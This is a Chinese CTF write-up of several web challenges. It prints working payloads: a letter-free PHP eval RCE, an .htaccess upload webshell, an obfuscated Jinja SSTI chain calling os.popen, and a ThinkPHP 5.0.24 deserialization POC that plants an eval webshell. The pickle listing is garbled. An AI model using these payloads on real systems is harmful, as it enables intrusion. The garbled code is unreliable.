CUMT2020-岁末赛

WEB

EZ_JS

image-20201224123233716image-20201224123233716

image-20201224123259063image-20201224123259063

这里有个好用的颜码解码网站:https://www.qtool.net/decode

EZ_RCE

爆破md5

import hashlib

# Proof-of-work solver for the EZ_RCE gate: print the smallest non-negative integer
# (as a decimal string) whose MD5 hex digest starts with "7b6db2", then stop.
# The upper bound is astronomically large; in practice the loop ends at the first hit.
TARGET_PREFIX = "7b6db2"
candidate = 0
while candidate < 1000000000000000000000:
    text = str(candidate)
    digest = hashlib.md5(text.encode("utf-8")).hexdigest()
    if digest.startswith(TARGET_PREFIX):
        print(text)
        break
    candidate += 1
        
 //2708999
<?php
// Challenge source (EZ_RCE), reproduced as-is. The shape is a textbook eval-on-input:
// $_POST['code'] is spliced into PHP source after a character denylist. No denylist
// makes eval() of request data safe; the only real fix is to not evaluate user input.
error_reporting(0); // suppresses every warning, including preg_match() failures below
if (!isset($_POST['code'])) {
    highlight_file(__FILE__); // deliberate source disclosure (CTF convention)
} else {
    // Gate: the first 6 hex digits of md5($_GET['pass']) must be "7b6db2" (solved by the
    // brute-force script above). Note the gate is read from the query string while the
    // code to evaluate comes from the POST body.
    if (substr(md5($_GET['pass']), 0, 6) === "7b6db2") {
        $str = $_POST['code'];
        // Denylist of PCRE fragments; each one is wrapped as '/<item>/im' in the loop below.
        $butaixing = ['[a-z]','\+', '[\x7f-\xff]', '~', '%','=',';','\s', '*',"'", '"', '`', '\[', '\]', '\$', '_', '\\\\', '\^', ',','#','!','<','>'];
        // Author's note (translated): not filtered: ( ) . ? digits { } / @ - _
        // (as written; '_' does appear in the list above)
        foreach ($butaixing as $item) {
            // preg_match() returns false (not 0) when a fragment is not a valid pattern on its
            // own; this condition treats that exactly like "no match", and error_reporting(0)
            // hides the failure. Defensive code would test `=== 1` and check preg_last_error().
            if (preg_match('/' . $item . '/im', $str)) {
                die("臭弟弟,你想干啥?");
            }
        }
        eval('echo ' . $str . ';'); // arbitrary code execution: request data becomes PHP source
    }
}
?>

这题是 改的RCTF的一题 , 利用一些神奇的操作获得字母

直接给出payload,后期单独总结

# system(end(getallheaders()))
code = ((((((1%2F0).(0))%7B0%7D)%7C(((2).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D))).((((1%2F0).(0))%7B0%7D)%7C(((0).(0))%7B0%7D)).(((((1%2F0).(0))%7B0%7D)%7C(((2).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((4).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((0).(0))%7B0%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((-10).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D))).((((1%2F0).(0))%7B0%7D)%7C(((-10).(0))%7B0%7D)))(((((((1%2F0).(0))%7B0%7D)%7C(((-10).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D))).((((1%2F0).(0))%7B1%7D)%7C(((1.1).(0))%7B1%7D)).(((((1%2F0).(0))%7B0%7D)%7C(((-10).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((0).(0))%7B0%7D))))(((((((1%2F0).(0))%7B0%7D)%7C(((1.1).(0))%7B1%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((-10).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((4).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((0).(0))%7B0%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((-10).(0))%7B0%7D))%26(((((1%2F0).(0))%7B0%7D)%7C(((0).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D)))).(((((1%2F0).(0))%7B0%7D)%7C(((4).(0))%7B0%7D))%26((((1%2F0).(0))%7B1%7D)%7C(((1.1).(0))%7B1%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((4).(0))%7B0%7D))%26((((1%2F0).(0))%7B1%7D)%7C(((1.1).(0))%7B1%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((0).(0))%7B0%7D))%26((((1%2F0).(0))%7B1%7D)%7C(((1.1).(0))%7B1%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((-10).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((-10).(0))%7B0%7D))%26(((((1%2F0).(0))%7B0%7D)%7C(((0).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D)))).(((((1%2F0).(0))%7B0%7D)%7C(((-10).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((0).(0))%7B0%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((-10).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((2).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((0).(0))%7B
0%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((2).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D))))()))
payload:
POST /?pass=2708999 HTTP/1.1
Host: 219.219.61.234:50001
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=u6qctifmhonae5lp6h3n1e51ot
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 2106
a: cat /tmp/flag_is_here

code=((((((1%2F0).(0))%7B0%7D)%7C(((2).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D))).((((1%2F0).(0))%7B0%7D)%7C(((0).(0))%7B0%7D)).(((((1%2F0).(0))%7B0%7D)%7C(((2).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((4).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((0).(0))%7B0%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((-10).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D))).((((1%2F0).(0))%7B0%7D)%7C(((-10).(0))%7B0%7D)))(((((((1%2F0).(0))%7B0%7D)%7C(((-10).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D))).((((1%2F0).(0))%7B1%7D)%7C(((1.1).(0))%7B1%7D)).(((((1%2F0).(0))%7B0%7D)%7C(((-10).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((0).(0))%7B0%7D))))(((((((1%2F0).(0))%7B0%7D)%7C(((1.1).(0))%7B1%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((-10).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((4).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((0).(0))%7B0%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((-10).(0))%7B0%7D))%26(((((1%2F0).(0))%7B0%7D)%7C(((0).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D)))).(((((1%2F0).(0))%7B0%7D)%7C(((4).(0))%7B0%7D))%26((((1%2F0).(0))%7B1%7D)%7C(((1.1).(0))%7B1%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((4).(0))%7B0%7D))%26((((1%2F0).(0))%7B1%7D)%7C(((1.1).(0))%7B1%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((0).(0))%7B0%7D))%26((((1%2F0).(0))%7B1%7D)%7C(((1.1).(0))%7B1%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((-10).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((-10).(0))%7B0%7D))%26(((((1%2F0).(0))%7B0%7D)%7C(((0).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D)))).(((((1%2F0).(0))%7B0%7D)%7C(((-10).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((0).(0))%7B0%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((-10).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D))).(((((1%2F0).(0))%7B0%7D)%7C(((2).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((0).(0))%7B0%
7D))).(((((1%2F0).(0))%7B0%7D)%7C(((2).(0))%7B0%7D))%26((((1%2F0).(0))%7B2%7D)%7C(((1).(0))%7B0%7D))))()))

image-20201224192839797image-20201224192839797

image-20201224193041277image-20201224193041277

EZ_upload

扫描目录

image-20201224201258096image-20201224201258096

访问可访问的目录

image-20201224201355301image-20201224201355301

hint_1

image-20201225143656131image-20201225143656131

//hint_2  源码
<?php
// Challenge source (EZ_upload, "hint_2"), reproduced as-is. It writes a user-supplied
// file into a per-session directory under the web root after a series of denylist
// checks. From a defensive standpoint the denylists are not the control that matters:
// user-written files should live outside the document root (or somewhere the web server
// will not interpret them), and the destination path must be constrained to the intended
// directory.
session_start();
if (!isset($_POST['content']) || !isset($_POST['filename'])) {
    echo "Missing something";
    die();
}

$content = $_POST['content'];
$filename = $_POST['filename'];

// Size limits: content at most 125 bytes, filename at most 10 bytes (strlen is byte-wise).
if (!is_string($content) || strlen($content) > 125) {
    echo "content is too long!!!";
    die();
}
if (!is_string($filename) || strlen($filename) > 10) {
    echo "filename is too long!!!";
    die();
}
// Reject control characters 0..30 except LF (chr(10)), and every byte >= 127.
for ($i = 0; $i < 31; $i++) {
    if ($i !== 10 && stristr($content, chr($i))) {
        echo "only visible character ";
        die();
    }
}
for ($i = 127; $i < 256; $i++) {
    if (stristr($content, chr($i))) {
        echo "only visible character ";
        die();
    }
}
// Case-insensitive keyword denylist applied to the content (stristr).
$content_blacklist = array("session",'set',"html", "type", "upload", "append", "prepend", "log", "script", "error", "include", "zend", "htaccess", "pcre", "\\", "\\\\","#", '>','=' );
foreach ($content_blacklist as $keywords) {
    if (stristr($content, $keywords)) {
        echo "Hacker";
        die();
    }
}
// The filename check is keyword-based only. Checks a reviewer would expect and that are
// absent here: basename() / rejection of path separators and "..", and an extension
// allowlist — the name is concatenated into the path below verbatim.
$filename_blacklist = array("ph", "ini",'pl','perl',"sh","py");
$append_string = "ohohohohohohohohoh!"; // appended to every stored file
// Per-client directory derived from the session cookie. NOTE(review): $_COOKIE['PHPSESSID']
// is read without isset(); if the cookie is absent this is md5('') plus a notice — confirm intended.
$yourdir = md5($_COOKIE['PHPSESSID']);
foreach ($filename_blacklist as $file_keys) {
    if (stristr($filename, $file_keys)) {
        echo "hacker";
        die();
    }
}
// The first request for a new session only creates the directory (mkdir errors suppressed);
// the write happens on a later request once the directory exists.
if (!is_dir($yourdir)) {
    @mkdir($yourdir);
}else {
    // Stored under the document root (see the echoed absolute path), so the web server may
    // interpret the stored file — as configuration or code — depending on its name and the
    // server's override settings. Mitigation: store outside the docroot and disable overrides.
    file_put_contents($yourdir . '/' . $filename, $content . $append_string);
    echo "file's path:  /var/www/html/".$yourdir . '/' . $filename;
}
?>
    
 // 过滤了AddType  setHandler  
payload:
上传 .htaccess
AddHandler application/x-httpd-php .aa ."" 123
//AddHandler 居然还能这么用……  涨知识


// "" 可以起到注释作用
然后使用短标签,传入后缀为.aa的文件,并且使用注释 // 

菜刀连接

image-20201230205613400image-20201230205613400

EZ_pickle

from flask import Flask, escape, request 
import pickle
import io 
import module_flag 
# Snapshot of sys.modules taken at import time; restricted_loads() restores it after each load.
beifen=module_flag.sys.modules 
app = Flask(__name__) 
# Challenge source (EZ_pickle) as pasted in the writeup. NOTE(review): indentation and line
# breaks below look garbled by the paste (two statements fused on the `return getattr(...)`
# line, decorated functions indented under nothing, a `//` line inside Python), so this
# listing is a reading copy rather than runnable code.
class RestrictedUnpickler(pickle.Unpickler): 
    # Substring denylist over (module, name). A denylist is the weak point of any "restricted"
    # unpickler: the safe construction is a positive allowlist of the exact module/name pairs
    # the application needs — and preferably no unpickling of request data at all.
    def find_class(self, module, name): 
        blackList =["system", "os", "global", "popen", "pickle", 'eval', 'exec', 'Flask', 'request', 'open', 'io','get','command','attr','dict','modules'] 
        for b in blackList:
            if b in module or b in name: 
                raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name)) 
                # NOTE(review): in the pasted indentation this allow branch follows an unconditional
                # raise, so it is unreachable as shown; presumably it belongs after the loop.
                if module == 'module_flag' and (name[:1] != '_'): 
                    return getattr(module_flag.sys.modules['module_flag'], name) raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name)) 
    # NOTE(review): indented like a method but takes no `self`; called as a bare name below.
    def restricted_loads(s): 
        res = RestrictedUnpickler(io.BytesIO(s)).load() 
        print(module_flag.sys.modules) 
        # Restore the import-time module table after the untrusted load.
        module_flag.sys.modules = beifen 
        print(module_flag.sys.modules) 
        return str(res) 
@app.route('/') 
    def index(): 
        return 'view source /src' 
@app.route('/src') 
    def src(): 
        # Deliberate source disclosure (CTF convention).
        file = open("/src/app.py").read() 
        return file 
@app.route('/pickle') 
    def NoVulnPickle(): 
        try: 
            # Author's note in a non-Python comment, kept as pasted (translated: "the code is
            # only occasionally reachable; logic error — only 'system' is actually filtered").
            //代码偶尔能访问,逻辑错误,只过滤了system
            p = request.args.get("pickle") 
            blackList = ["system" ,"os" ,"popen" , "pickle", 'eval', 'exec', 'Flask', 'request', 'open', 'io','get','command','attr','dict','modules','global'] 
         # NOTE(review): as indented here, both branches return on the first iteration, so only
         # blackList[0] is ever compared before the payload is loaded.
         for b in blackList: 
            if b in p: 
                return "hacker!" 
            else: 
                p = p.encode() 
                # print(p) 
                  return restricted_loads(p) 
        # Broad catch turns every failure (including unpickling errors) into a fixed string.
        except Exception as e: 
            return 'failed' 
        return "OK" 
if __name__=="__main__": 
    # Listens on all interfaces; the port is passed as a string.
    app.run(debug=False,host = '0.0.0.0',port='5000')

看完代码,一脸懵逼,这题不会,寒假学习:anger: (寒假没了)

EZ_flask

//爆破md5
import hashlib

# Proof-of-work solver for the EZ_flask gate: print the first non-negative integer
# (as a decimal string) whose MD5 hex digest begins with "52491", then stop.
def _md5_hex(text):
    # Hex digest of the UTF-8 encoding of `text`.
    return hashlib.md5(text.encode("utf-8")).hexdigest()

for number in map(str, range(100000000)):
    if _md5_hex(number)[:5] == "52491":
        print(number)
        break
     // 具体md5值按实际情况更改

测试发现题目中 {} 不能同时在一起 ,用户名和后面的参数我们可控,所以分开构造{}

// username={{" 
session:eyJoYXNoMSI6ImU0ODZhIiwicGFzc3dvcmQiOiIxODkxMzEwIiwic3RhdHVzIjoxLCJ1c2VybmFtZSI6Int7XCIifQ.X-YGjg.2-hzaxNZJk0O-889uMo3wnxMBkE

这里先直接贴出payload;考试后去学习

http://219.219.61.234:50007/"|attr("%c%c%c%c%c%c%c%c%c"%(95,95,99,108,97,115,115,95,95))|attr("%c%c%c%c%c%c%c%c"%(95,95,98,97,115,101,95,95))|attr("%c%c%c%c%c%c%c%c%c%c%c%c%c%c"%(95,95,115,117,98,99,108,97,115,115,101,115,95,95))()|attr("%c%c%c%c%c%c%c%c%c%c%c"%(95,95,103,101,116,105,116,101,109,95,95))(164)|attr("%c%c%c%c%c%c%c%c"%(95,95,105,110,105,116,95,95))|attr("%c%c%c%c%c%c%c%c%c%c%c"%(95,95,103,108,111,98,97,108,115,95,95))|attr("%c%c%c%c%c%c%c%c%c%c%c"%(95,95,103,101,116,105,116,101,109,95,95))("%c%c%c%c%c%c%c%c%c%c%c%c"%(95,95,98,117,105,108,116,105,110,115,95,95))|attr("%c%c%c%c%c%c%c%c%c%c%c"%(95,95,103,101,116,105,116,101,109,95,95))("%c%c%c%c"%(101,118,97,108))("%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"%(95,95,105,109,112,111,114,116,95,95,40,39,111,115,39,41,46,112,111,112,101,110,40,39,99,97,116,32,47,102,108,97,103,103,103,103,103,103,103,103,103,39,41,46,114,101,97,100,40,41))}}

EZ_thinkphp

扫描目录,发现源码

image-20201226123828906image-20201226123828906

// www\source\application\index\controller\index.php
<?php

namespace app\index\controller;

use think\Controller;

/**
 * Challenge entry controller (EZ_thinkphp), reproduced from the writeup.
 *
 * SECURITY: the POST field `a` is base64-decoded and handed to unserialize() with no
 * validation; the `@` only hides errors. Deserialising untrusted input is the weakness
 * the POC below targets. The defensive form is json_decode(), or at minimum
 * unserialize($s, ['allowed_classes' => false]) — never raw unserialize() on request data.
 */
class Index extends Controller
{
    /**
     * Index action: decodes and unserializes POST `a`, then returns a fixed version banner.
     * The unserialized value is discarded.
     */
    public function index()
    {
        $encoded = $this->request->post('a');
        @unserialize(base64_decode($encoded));

        return 'thinkphp 5.0.24';
    }
}
// 利用点 

参考文章 直接白嫖poc :airplane:

poc

<?php
namespace think\process\pipes;
use think\model\Pivot;
// POC gadget: empty stand-in for think\process\pipes\Pipes (base class of Windows below).
class Pipes{

}

// POC gadget: stand-in for think\process\pipes\Windows. Only $files is declared — the
// property the serialized payload needs — and it is seeded with a Pivot (a Model subclass).
class Windows extends Pipes{
    private $files = [];

    function __construct(){
        $this->files = [new Pivot()];
    }
}

namespace think\model;#Relation
use think\db\Query;
// POC gadget: stand-in for the abstract think\model\Relation.
abstract class Relation{
    protected $selfRelation;
    protected $query;
    function __construct(){
        $this->selfRelation = false;
        $this->query = new Query(); # Query stand-in defined further down
    }
}

namespace think\model\relation;#OneToOne HasOne
use think\model\Relation;
// POC gadget: stand-in for think\model\relation\OneToOne; adds nothing beyond Relation.
abstract class OneToOne extends Relation{
    function __construct(){
        parent::__construct();
    }

}
// POC gadget: stand-in for think\model\relation\HasOne; $bindAttr is the only extra property.
class HasOne extends OneToOne{
    protected $bindAttr = [];
    function __construct(){
        parent::__construct();
        $this->bindAttr = ["no","123"];
    }
}

namespace think\console;#Output
use think\session\driver\Memcached;
// POC gadget: stand-in for think\console\Output.
class Output{
    private $handle = null;
    protected $styles = [];
    function __construct(){
        $this->handle = new Memcached(); // purpose: reach its write()
        $this->styles = ['getAttr'];
    }
}

namespace think;#Model
use think\model\relation\HasOne;
use think\console\Output;
use think\db\Query;
// POC gadget: stand-in for the abstract think\Model. Property order and visibility here
// determine the serialized form, so they are kept exactly as in the writeup.
abstract class Model{
    protected $append = [];
    protected $error;
    public $parent; # modified here (author's note)
    protected $selfRelation;
    protected $query;
    protected $aaaaa;

    function __construct(){
        $this->parent = new Output(); # Output object; purpose: reach __call()
        $this->append = ['getError'];
        $this->error = new HasOne(); // Relation subclass that has getBindAttr()
        $this->selfRelation = false; // isSelfRelation()
        $this->query = new Query();

    }
}

namespace think\db;#Query
use think\console\Output;
// POC gadget: stand-in for think\db\Query; $model holds an Output instance.
class Query{
    protected $model;
    function __construct(){
        $this->model = new Output();
    }
}

namespace think\session\driver;#Memcached
use think\cache\driver\File;
// POC gadget: stand-in for think\session\driver\Memcached.
class Memcached{
    protected $handler = null;
    function __construct(){
        $this->handler = new File(); // purpose: reach File->set()
    }
}
namespace think\cache\driver;#File
// POC gadget: stand-in for think\cache\driver\File. The 'path' option is reproduced
// byte-for-byte from the writeup; the author's notes after the POC describe how the
// resulting file name is formed from it and from $tag.
class File{
    protected $options = [];
    protected $tag;
    function __construct(){
        $this->options = [
        'expire'        => 0,
        'cache_subdir'  => false,
        'prefix'        => '',
        'path'          => 'php://filter/write=string.rot13/resource=./<?cuc cucvasb();riny($_TRG[pzq]);?>',
        'data_compress' => false,
        ];
        $this->tag ='abcdef';
    }
}

namespace think\model;
use think\Model;
// POC gadget: concrete think\model\Pivot so the abstract Model stand-in can be instantiated.
class Pivot extends Model{


}
use think\process\pipes\Windows;
// Emit the serialized object graph, base64-encoded to match what Index::index() decodes.
$chain = serialize(new Windows());
echo base64_encode($chain);
//在index.php页面传入值
// 文件的名字是:传入内容+md5('tag_'+md5($tag)).php 并且部分需要urlcode转码
// <%3fcuc cucvasb()%3briny($_TRG[pzq])%3b%3f>468bc8d30505000a2d7d24702b2cda94.php

执行命令即可

image-20201226140139525image-20201226140139525

最后修改于:2021年03月31日 21:45
